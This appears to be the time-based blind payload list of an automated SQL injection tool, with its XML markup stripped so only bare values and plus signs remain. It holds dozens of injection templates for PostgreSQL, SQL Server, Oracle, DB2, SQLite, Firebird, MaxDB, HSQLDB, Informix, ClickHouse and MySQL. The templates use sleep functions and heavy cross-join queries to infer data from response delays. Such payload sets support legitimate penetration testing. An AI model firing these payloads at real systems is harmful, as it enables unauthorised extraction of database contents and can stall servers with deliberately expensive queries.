+
+ + + PostgreSQL > 8.1 AND time-based blind + 5 + 1 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 OR time-based blind + 5 + 1 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind (IF) + 5 + 1 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase time-based blind (IF - comment) + 5 + 4 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle AND time-based blind + 5 + 1 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind + 5 + 1 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + IBM DB2 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird >= 2.0 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,9 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,9 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,9 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,9 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + -- + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + > 2.0 +
+
+ + + Informix AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + Informix OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + Informix AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+
+ + + Informix OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+
+ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + ClickHouse OR time-based blind (heavy query) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + + + + + MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) + 5 + 3 + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE) + 5 + 5 + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + + + MySQL >= 5.0.12 time-based blind - Parameter replace + 5 + 2 + 1 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) + 5 + 3 + 1 + 1,2,3,9 + 3 + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 3 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL time-based blind - Parameter replace (bool) + 5 + 4 + 1 + 1,2,3,9 + 3 + ([INFERENCE] AND SLEEP([SLEEPTIME])) + + ([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL time-based blind - Parameter replace (ELT) + 5 + 5 + 1 + 1,2,3,9 + 3 + ELT([INFERENCE],SLEEP([SLEEPTIME])) + + ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL time-based blind - Parameter replace (MAKE_SET) + 5 + 5 + 1 + 1,2,3,9 + 3 + MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) + + MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 time-based blind - Parameter replace + 5 + 3 + 1 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
